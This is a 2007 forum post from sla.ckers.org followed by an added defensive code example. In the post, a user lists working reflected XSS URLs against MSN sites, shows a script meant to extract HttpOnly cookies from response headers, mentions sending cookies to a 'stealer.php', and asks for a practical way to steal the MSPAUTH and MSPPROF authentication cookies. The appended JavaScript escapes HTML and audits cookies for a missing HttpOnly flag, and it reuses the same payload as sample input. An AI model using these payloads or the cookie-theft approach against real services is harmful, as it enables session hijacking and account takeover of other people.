Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
msn xss
Posted by: fireboy
Date: June 28, 2007 02:38AM

Hi

I found many variants of MSN XSS and I get the cookies, but as it's an HttpOnly cookie I can't read the MSPAUTH and MSPPROF variables.

+ I tried the XST method but it doesn't work with MSN servers

+ I tried to send the cookie through a frame to my stealer.php but it does not work

+ I tried this script (supposed to extract all the cookies from the headers and alert them in clear):

-----------------------------------------------------------------------------

<script language="Javascript" type="text/javascript">

// the function that extracts the hidden cookie from the headers
function unHideCookie()
{
var xhr=new XMLHttpRequest(); // create the object
xhr.open("HEAD",document.location,true); // make a HEAD request to the same page
xhr.send(null); // send the request
xhr.onreadystatechange=function()
{
if(xhr.readyState==4)
{
if(xhr.status==200) // if we get the right response
{
var hidden="";
var headers=xhr.getAllResponseHeaders().split("\n"); // read all the headers and store them into an array
for(i=0;i<headers.length;i++)
{
var header=headers.toLowerCase(); // indexOf is case sensitive
if(header.indexOf("httponly")>0) // when we find a hidden cookie
{
var cookie=headers.substring(headers.indexOf(" ")+1,headers.indexOf(";")+1); // extract the "name=value;" sequence
hidden=hidden+cookie+" "; // add the extracted cookie
}
}
// use the hidden cookies that are now in the "hidden" variable
alert(Hidden Cookies: "+hidden);
}
}
}
}
alert("document.cookie: "+document.cookie); // show the visible cookies
unHideCookie(); // show the hidden cookies
</script>

-----------------------------------------------------------------------------
but it does not work either

Any help please to bypass the httpcookie and get all the attributes?

Here are some examples of MSN XSS, but there are mooooooore :)

------------------------------------------------------------------------
htp://map.msn.com.cn/mapsearch/result.jsp?city=35"><script>alert(document.cookie)</script>


htp://search.arabia.msn.com/results.aspx?q="><script>alert(document.cookie)</script>

--------------------------------------------------------------------------

Please, I need a practical solution
thx
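
Seen from the defending side, the post touches two controls: output encoding of the reflected parameter and the HttpOnly flag on the authentication cookies. The following is an added example, not part of the original post; the function names, the sample headers and the cookie values are constructed for illustration. It audits a response for sensitive cookies set without HttpOnly and shows attribute-context escaping applied to input shaped like the `city` parameter above.

```javascript
// Escape a value for use inside a double-quoted HTML attribute or element text.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Parse one Set-Cookie header value into its name and the flags checked here.
function parseSetCookie(value) {
  const parts = value.split(";").map((p) => p.trim());
  const eq = parts[0].indexOf("=");
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const attrs = parts.slice(1).map((p) => p.split("=")[0].toLowerCase());
  return { name, httpOnly: attrs.includes("httponly"), secure: attrs.includes("secure") };
}

// Return the names of sensitive cookies that the response sets without HttpOnly.
function auditCookies(rawHeaders, sensitiveNames) {
  const findings = [];
  for (const line of rawHeaders.split(/\r?\n/)) {
    const m = /^set-cookie:\s*(.*)$/i.exec(line);
    if (!m) continue; // status line and other headers are ignored
    const cookie = parseSetCookie(m[1]);
    if (sensitiveNames.includes(cookie.name) && !cookie.httpOnly) findings.push(cookie.name);
  }
  return findings;
}

// Render the reflected value safely inside an attribute (hypothetical template).
function renderCityField(city) {
  return '<input name="city" value="' + escapeHtml(city) + '">';
}

// Constructed sample response headers; cookie values are placeholders.
const SAMPLE_HEADERS = [
  "HTTP/1.1 200 OK",
  "Set-Cookie: MSPAUTH=placeholder1; path=/; HttpOnly",
  "Set-Cookie: MSPPROF=placeholder2; path=/",
  "Set-Cookie: lang=en; path=/",
].join("\r\n");

// Constructed input with the same shape as the reflected parameter in the post.
const SAMPLE_PARAM = '35"><script>alert(document.cookie)</script>';

console.log(auditCookies(SAMPLE_HEADERS, ["MSPAUTH", "MSPPROF"]));
console.log(renderCityField(SAMPLE_PARAM));
```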
